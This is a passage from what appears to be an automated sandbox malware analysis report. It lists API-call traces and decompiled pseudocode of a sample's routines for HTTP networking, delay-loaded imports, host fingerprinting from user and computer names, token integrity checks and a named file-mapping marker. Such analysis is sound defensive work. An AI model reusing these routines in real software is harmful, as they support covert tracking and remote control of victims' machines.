                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04F97A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04F97A91
                    • InternetSetStatusCallback.WININET(00000000,04F979C9), ref: 04F97AA8
                    • ResetEvent.KERNEL32(?), ref: 04F97ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04F97ACD
                    • GetLastError.KERNEL32 ref: 04F97ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04F97B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04F97B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04F97B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04F97B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04F97B7B
                    • GetLastError.KERNEL32 ref: 04F97B85
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: 1e46c96277698eb931decf71c40454e46ff7a84b9f8b255e66bfc972bf8ac3cd
                    • Instruction ID: 43a76dfc9391d947ae1add32ec3fb5ff9389543e242d74a5da22fd4659ca23a5
                    • Opcode Fuzzy Hash: 1e46c96277698eb931decf71c40454e46ff7a84b9f8b255e66bfc972bf8ac3cd
                    • Instruction Fuzzy Hash: 4A413C71900248FBEB21AF65EC48EABBBFDEF85704F104929F512D11A0EB75AD45CB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 51%
                    			E04F97E75(long _a4, long _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				LONG* _v28;
                    				long _v40;
                    				long _v44;
                    				long _v48;
                    				CHAR* _v52;
                    				long _v56;
                    				CHAR* _v60;
                    				long _v64;
                    				signed int* _v68;
                    				char _v72;
                    				signed int _t76;
                    				signed int _t80;
                    				signed int _t81;
                    				intOrPtr* _t82;
                    				intOrPtr* _t83;
                    				intOrPtr* _t85;
                    				intOrPtr* _t90;
                    				intOrPtr* _t95;
                    				intOrPtr* _t98;
                    				struct HINSTANCE__* _t99;
                    				void* _t102;
                    				intOrPtr* _t104;
                    				void* _t115;
                    				long _t116;
                    				void _t125;
                    				void* _t131;
                    				signed short _t133;
                    				struct HINSTANCE__* _t138;
                    				signed int* _t139;
                    
                    				_t139 = _a4;
                    				_v28 = _t139[2] + 0x4f90000;
                    				_t115 = _t139[3] + 0x4f90000;
                    				_t131 = _t139[4] + 0x4f90000;
                    				_v8 = _t139[7];
                    				_v60 = _t139[1] + 0x4f90000;
                    				_v16 = _t139[5] + 0x4f90000;
                    				_v64 = _a8;
                    				_v72 = 0x24;
                    				_v68 = _t139;
                    				_v56 = 0;
                    				asm("stosd");
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v40 = 0;
                    				if(( *_t139 & 0x00000001) == 0) {
                    					_a8 =  &_v72;
                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                    					return 0;
                    				}
                    				_t138 =  *_v28;
                    				_t76 = _a8 - _t115 >> 2 << 2;
                    				_t133 =  *(_t131 + _t76);
                    				_a4 = _t76;
                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                    				_v56 = _t80;
                    				_t81 = _t133 + 0x4f90002;
                    				if(_t80 == 0) {
                    					_t81 = _t133 & 0x0000ffff;
                    				}
                    				_v52 = _t81;
                    				_t82 =  *0x4f9a1c0; // 0x0
                    				_t116 = 0;
                    				if(_t82 == 0) {
                    					L6:
                    					if(_t138 != 0) {
                    						L18:
                    						_t83 =  *0x4f9a1c0; // 0x0
                    						_v48 = _t138;
                    						if(_t83 != 0) {
                    							_t116 =  *_t83(2,  &_v72);
                    						}
                    						if(_t116 != 0) {
                    							L32:
                    							 *_a8 = _t116;
                    							L33:
                    							_t85 =  *0x4f9a1c0; // 0x0
                    							if(_t85 != 0) {
                    								_v40 = _v40 & 0x00000000;
                    								_v48 = _t138;
                    								_v44 = _t116;
                    								 *_t85(5,  &_v72);
                    							}
                    							return _t116;
                    						} else {
                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                    								L27:
                    								_t116 = GetProcAddress(_t138, _v52);
                    								if(_t116 == 0) {
                    									_v40 = GetLastError();
                    									_t90 =  *0x4f9a1bc; // 0x0
                    									if(_t90 != 0) {
                    										_t116 =  *_t90(4,  &_v72);
                    									}
                    									if(_t116 == 0) {
                    										_a4 =  &_v72;
                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                    										_t116 = _v44;
                    									}
                    								}
                    								goto L32;
                    							} else {
                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                    									_t116 =  *(_a4 + _v16);
                    									if(_t116 != 0) {
                    										goto L32;
                    									}
                    								}
                    								goto L27;
                    							}
                    						}
                    					}
                    					_t98 =  *0x4f9a1c0; // 0x0
                    					if(_t98 == 0) {
                    						L9:
                    						_t99 = LoadLibraryA(_v60); // executed
                    						_t138 = _t99;
                    						if(_t138 != 0) {
                    							L13:
                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                    								FreeLibrary(_t138);
                    							} else {
                    								if(_t139[6] != 0) {
                    									_t102 = LocalAlloc(0x40, 8);
                    									if(_t102 != 0) {
                    										 *(_t102 + 4) = _t139;
                    										_t125 =  *0x4f9a1b8; // 0x0
                    										 *_t102 = _t125;
                    										 *0x4f9a1b8 = _t102;
                    									}
                    								}
                    							}
                    							goto L18;
                    						}
                    						_v40 = GetLastError();
                    						_t104 =  *0x4f9a1bc; // 0x0
                    						if(_t104 == 0) {
                    							L12:
                    							_a8 =  &_v72;
                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                    							return _v44;
                    						}
                    						_t138 =  *_t104(3,  &_v72);
                    						if(_t138 != 0) {
                    							goto L13;
                    						}
                    						goto L12;
                    					}
                    					_t138 =  *_t98(1,  &_v72);
                    					if(_t138 != 0) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				_t116 =  *_t82(0,  &_v72);
                    				if(_t116 != 0) {
                    					goto L33;
                    				}
                    				goto L6;
                    			}


































                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F97EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04F97F6B
                    • GetLastError.KERNEL32 ref: 04F97F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04F97FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 62c169d8d04a74dbe6f9e84613306552a08018ad2b7692a816bb7c80a656e8fb
                    • Instruction ID: e6645c81cd5d7c5c74af889924e56e6d19fb362976e63a5ef37ac944184c7ab1
                    • Opcode Fuzzy Hash: 62c169d8d04a74dbe6f9e84613306552a08018ad2b7692a816bb7c80a656e8fb
                    • Instruction Fuzzy Hash: 56813871A10209AFEF10DFA9D884AADB7F5FB48340F148029E915E7350EBB4ED46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 96%
                    			E04F921BC(char __eax, signed int* __esi) {
                    				long _v8;
                    				char _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v28;
                    				long _t34;
                    				signed int _t39;
                    				long _t50;
                    				char _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				void* _t63;
                    				signed int* _t64;
                    				char _t65;
                    				intOrPtr* _t67;
                    				void* _t68;
                    				signed int* _t69;
                    
                    				_t69 = __esi;
                    				_t65 = __eax;
                    				_v8 = 0;
                    				_v12 = __eax;
                    				if(__eax == 0) {
                    					_t59 =  *0x4f9a310; // 0xd448b889
                    					_v12 = _t59;
                    				}
                    				_t64 = _t69;
                    				E04F95894( &_v12, _t64);
                    				if(_t65 != 0) {
                    					 *_t69 =  *_t69 ^  *0x4f9a31c ^ 0x46d76429;
                    				} else {
                    					GetUserNameW(0,  &_v8); // executed
                    					_t50 = _v8;
                    					if(_t50 != 0) {
                    						_t62 = RtlAllocateHeap( *0x4f9a2d8, 0, _t50 + _t50);
                    						if(_t62 != 0) {
                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                    								_t63 = _t62;
                    								 *_t69 =  *_t69 ^ E04F952A9(_v8 + _v8, _t63);
                    							}
                    							HeapFree( *0x4f9a2d8, 0, _t62);
                    						}
                    					}
                    				}
                    				_t61 = __imp__;
                    				_v8 = _v8 & 0x00000000;
                    				GetComputerNameW(0,  &_v8);
                    				_t34 = _v8;
                    				if(_t34 != 0) {
                    					_t68 = RtlAllocateHeap( *0x4f9a2d8, 0, _t34 + _t34);
                    					if(_t68 != 0) {
                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                    							_t63 = _t68;
                    							_t69[3] = _t69[3] ^ E04F952A9(_v8 + _v8, _t63);
                    						}
                    						HeapFree( *0x4f9a2d8, 0, _t68);
                    					}
                    				}
                    				asm("cpuid");
                    				_t67 =  &_v28;
                    				 *_t67 = 1;
                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                    				 *(_t67 + 8) = _t63;
                    				 *(_t67 + 0xc) = _t64;
                    				_t39 = _v16 ^ _v20 ^ _v28;
                    				_t69[1] = _t69[1] ^ _t39;
                    				return _t39;
                    			}




















                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F921F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F9220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F92217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F92238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F9225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F92273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F92280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F9229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 072fe40940b9a647fbdef66144fb42fff8f6c7639644e518570ff4c93fa379bf
                    • Instruction ID: 7155e308eb6439b7740991d4e038e91195331ffd21cdf072f199beab46c81125
                    • Opcode Fuzzy Hash: 072fe40940b9a647fbdef66144fb42fff8f6c7639644e518570ff4c93fa379bf
                    • Instruction Fuzzy Hash: 7D313C72A00209FFEB15DFA9EC81A6EB7F9EF88300F114869E505D3260EB34ED459B10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E04F9414A(intOrPtr __edx, void** _a4, void** _a8) {
                    				intOrPtr _v8;
                    				struct _FILETIME* _v12;
                    				short _v56;
                    				struct _FILETIME* _t12;
                    				intOrPtr _t13;
                    				void* _t17;
                    				void* _t21;
                    				intOrPtr _t27;
                    				long _t28;
                    				void* _t30;
                    
                    				_t27 = __edx;
                    				_t12 =  &_v12;
                    				GetSystemTimeAsFileTime(_t12);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v8);
                    				_push(_v12);
                    				L04F98184();
                    				_push(_t12);
                    				_v12 = _t12;
                    				_t13 =  *0x4f9a320; // 0xb2d5a8
                    				_t5 = _t13 + 0x4f9b87e; // 0x5ac8e26
                    				_t6 = _t13 + 0x4f9b59c; // 0x530025
                    				_push(0x16);
                    				_push( &_v56);
                    				_v8 = _t27;
                    				L04F97DEA();
                    				_t17 = CreateFileMappingW(0xffffffff, 0x4f9a34c, 4, 0, 0x1000,  &_v56); // executed
                    				_t30 = _t17;
                    				if(_t30 == 0) {
                    					_t28 = GetLastError();
                    				} else {
                    					if(GetLastError() == 0xb7) {
                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                    						if(_t21 == 0) {
                    							_t28 = GetLastError();
                    							if(_t28 != 0) {
                    								goto L6;
                    							}
                    						} else {
                    							 *_a4 = _t30;
                    							 *_a8 = _t21;
                    							_t28 = 0;
                    						}
                    					} else {
                    						_t28 = 2;
                    						L6:
                    						CloseHandle(_t30);
                    					}
                    				}
                    				return _t28;
                    			}

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?,?), ref: 04F94156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04F9416C
                    • _snwprintf.NTDLL ref: 04F94191
                    • CreateFileMappingW.KERNELBASE(000000FF,04F9A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04F941AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?), ref: 04F941BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04F941D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53), ref: 04F941F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04F965C3,?,?,4D283A53,?), ref: 04F941FF
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 274e3f025263cd0af635b38421630f9a0217cae98c87f3f6837b2446cb3af028
                    • Instruction ID: e64720cf541718e74a5599253fe1c35240b79023c194348fca197400816cb260
                    • Opcode Fuzzy Hash: 274e3f025263cd0af635b38421630f9a0217cae98c87f3f6837b2446cb3af028
                    • Instruction Fuzzy Hash: AB21A8B2A00218BBEB12AB64DC05F9E37E9EB94754F150125F615E72D0DBB0ED47CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04F95622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr _t24;
                    				void* _t37;
                    				void* _t41;
                    				intOrPtr* _t45;
                    
                    				_t41 = __edi;
                    				_t37 = __ebx;
                    				_t45 = __eax;
                    				_t16 =  *((intOrPtr*)(__eax + 0x20));
                    				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                    					E04F95867(_t16, __ecx, 0xea60);
                    				}
                    				_t17 =  *(_t45 + 0x18);
                    				_push(_t37);
                    				_push(_t41);
                    				if(_t17 != 0) {
                    					InternetSetStatusCallback(_t17, 0);
                    					InternetCloseHandle( *(_t45 + 0x18)); // executed
                    				}
                    				_t18 =  *(_t45 + 0x14);
                    				if(_t18 != 0) {
                    					InternetSetStatusCallback(_t18, 0);
                    					InternetCloseHandle( *(_t45 + 0x14));
                    				}
                    				_t19 =  *(_t45 + 0x10);
                    				if(_t19 != 0) {
                    					InternetSetStatusCallback(_t19, 0);
                    					InternetCloseHandle( *(_t45 + 0x10));
                    				}
                    				_t20 =  *(_t45 + 0x1c);
                    				if(_t20 != 0) {
                    					CloseHandle(_t20);
                    				}
                    				_t21 =  *(_t45 + 0x20);
                    				if(_t21 != 0) {
                    					CloseHandle(_t21);
                    				}
                    				_t22 =  *((intOrPtr*)(_t45 + 8));
                    				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                    					E04F917AB(_t22);
                    					 *((intOrPtr*)(_t45 + 8)) = 0;
                    					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                    				}
                    				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                    				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                    					E04F917AB(_t23);
                    				}
                    				_t24 =  *_t45;
                    				if(_t24 != 0) {
                    					_t24 = E04F917AB(_t24);
                    				}
                    				_t46 =  *((intOrPtr*)(_t45 + 4));
                    				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                    					return E04F917AB(_t46);
                    				}
                    				return _t24;
                    			}

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95650
                    • InternetCloseHandle.WININET(?), ref: 04F95655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95660
                    • InternetCloseHandle.WININET(?), ref: 04F95665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04F95670
                    • InternetCloseHandle.WININET(?), ref: 04F95675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04F91B44,?,?,00000000,00000000,74E481D0), ref: 04F95685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04F91B44,?,?,00000000,00000000,74E481D0), ref: 04F9568F
                      • Part of subcall function 04F95867: WaitForMultipleObjects.KERNEL32(00000002,04F97AF8,00000000,04F97AF8,?,?,?,04F97AF8,0000EA60), ref: 04F95882
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: eaf52de2b4ad80542e7377d033ee37e4f20befb70d41f00f8339700ba3cd925d
                    • Instruction ID: 1c8ed64135f21e16ee1efcdb0b86d2685e137127439ebc333356c754b20d39f3
                    • Opcode Fuzzy Hash: eaf52de2b4ad80542e7377d033ee37e4f20befb70d41f00f8339700ba3cd925d
                    • Instruction Fuzzy Hash: C8114976E007486BEA31AFAAECC4C1BB7FDAF443843551D29E086D3510CB35FC868A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E04F913CF(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void _v16;
                    				long _v20;
                    				int _t33;
                    				void* _t46;
                    
                    				_v16 = 1;
                    				_v20 = 0x2000;
                    				if( *0x4f9a2fc > 5) {
                    					_v16 = 0;
                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                    						_v8 = 0;
                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                    						if(_v8 != 0) {
                    							_t46 = E04F963FD(_v8);
                    							if(_t46 != 0) {
                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                    								if(_t33 != 0) {
                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                    								}
                    								E04F917AB(_t46);
                    							}
                    						}
                    						CloseHandle(_v12);
                    					}
                    				}
                    				 *_a4 = _v20;
                    				return _v16;
                    			}

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04F91401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04F91421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04F91431
                    • CloseHandle.KERNEL32(00000000), ref: 04F91481
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04F91454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F9145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F9146C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 8a62d5aa4e07ca65f1cec7334f66a5df0fc779efb38245495873e28cc86950e9
                    • Instruction ID: 2b20ffd40fb27e5d52ace430077cbe895ec7e120626f91e1a95bb91f355247e0
                    • Opcode Fuzzy Hash: 8a62d5aa4e07ca65f1cec7334f66a5df0fc779efb38245495873e28cc86950e9
                    • Instruction Fuzzy Hash: 3D212875D0024EFFFF009FA5DD84EAEBBB9EB49304F0040A5E910A6260DB755E55DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E04F918BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _t9;
                    				intOrPtr _t13;
                    				char* _t19;
                    				char* _t28;
                    				void* _t33;
                    				void* _t34;
                    				char* _t36;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				char* _t40;
                    				char* _t42;
                    				char* _t43;
                    
                    				_t34 = __edx;
                    				_push(__ecx);
                    				_t9 =  *0x4f9a320; // 0xb2d5a8
                    				_t1 = _t9 + 0x4f9b62c; // 0x253d7325
                    				_t36 = 0;
                    				_t28 = E04F961A7(__ecx, _t1);
                    				if(_t28 != 0) {
                    					_t39 = __imp__;
                    					_t13 =  *_t39(_t28, _t38);
                    					_v8 = _t13;
                    					_t40 = E04F963FD(_v8 +  *_t39(_a4) + 1);
                    					if(_t40 != 0) {
                    						strcpy(_t40, _t28);
                    						_pop(_t33);
                    						__imp__(_t40, _a4);
                    						_t19 = E04F97885(_t33, _t34, _t40, _a8); // executed
                    						_t36 = _t19;
                    						E04F917AB(_t40);
                    						_t42 = E04F96863(StrTrimA(_t36, "="), _t36);
                    						if(_t42 != 0) {
                    							E04F917AB(_t36);
                    							_t36 = _t42;
                    						}
                    						_t43 = E04F95ACD(_t36, _t33);
                    						if(_t43 != 0) {
                    							E04F917AB(_t36);
                    							_t36 = _t43;
                    						}
                    					}
                    					E04F917AB(_t28);
                    				}
                    				return _t36;
                    			}

                    APIs
                      • Part of subcall function 04F961A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04F918D3,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F9620E
                      • Part of subcall function 04F961A7: sprintf.NTDLL ref: 04F9622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                    • lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • strcpy.NTDLL ref: 04F91904
                    • lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F97885: lstrlen.KERNEL32(?,?,?,00000000,?,04F9191E,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F97896
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                      • Part of subcall function 04F96863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F91938,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F9686D
                      • Part of subcall function 04F96863: _snprintf.NTDLL ref: 04F968CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 2259d6411da811b92c9e4ac562a6f46e91b23d5a1d7076c3549c29e054fdfdd0
                    • Instruction ID: 7007fc1dee324c814e65ec91c28804df03193f9d5f0d6527f3bd10edfcd6ae1b
                    • Opcode Fuzzy Hash: 2259d6411da811b92c9e4ac562a6f46e91b23d5a1d7076c3549c29e054fdfdd0
                    • Instruction Fuzzy Hash: 82117377D01526777F126B759C84CAE37FD9F85A543090129F901E7200DE78ED0387A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4f91e51-4f91e9d SysAllocString 342 4f91fc1-4f91fc4 341->342 343 4f91ea3-4f91ecf 341->343 344 4f91fcf-4f91fd2 342->344 345 4f91fc6-4f91fc9 SafeArrayDestroy 342->345 349 4f91fbe 343->349 350 4f91ed5-4f91ee1 call 4f956cf 343->350 347 4f91fdd-4f91fe4 344->347 348 4f91fd4-4f91fd7 SysFreeString 344->348 345->344 348->347 349->342 350->349 353 4f91ee7-4f91ef7 350->353 353->349 355 4f91efd-4f91f23 IUnknown_QueryInterface_Proxy 353->355 355->349 357 4f91f29-4f91f3d 355->357 359 4f91f7b-4f91f7e 357->359 360 4f91f3f-4f91f42 357->360 361 4f91f80-4f91f85 359->361 362 4f91fb5-4f91fba 359->362 360->359 363 4f91f44-4f91f5b StrStrIW 360->363 361->362 364 4f91f87-4f91f92 call 4f957a8 361->364 362->349 365 4f91f5d-4f91f66 call 4f93d67 363->365 366 4f91f72-4f91f75 SysFreeString 363->366 370 4f91f97-4f91f9b 364->370 365->366 371 4f91f68-4f91f70 call 4f956cf 365->371 366->359 370->362 372 4f91f9d-4f91fa2 370->372 371->366 374 4f91fb0 372->374 375 4f91fa4-4f91fae 372->375 374->362 375->362
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04F91E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04F91F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04F91F53
                    • SysFreeString.OLEAUT32(?), ref: 04F91F75
                      • Part of subcall function 04F93D67: SysAllocString.OLEAUT32(04F99290), ref: 04F93DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 04F91FC9
                    • SysFreeString.OLEAUT32(?), ref: 04F91FD7
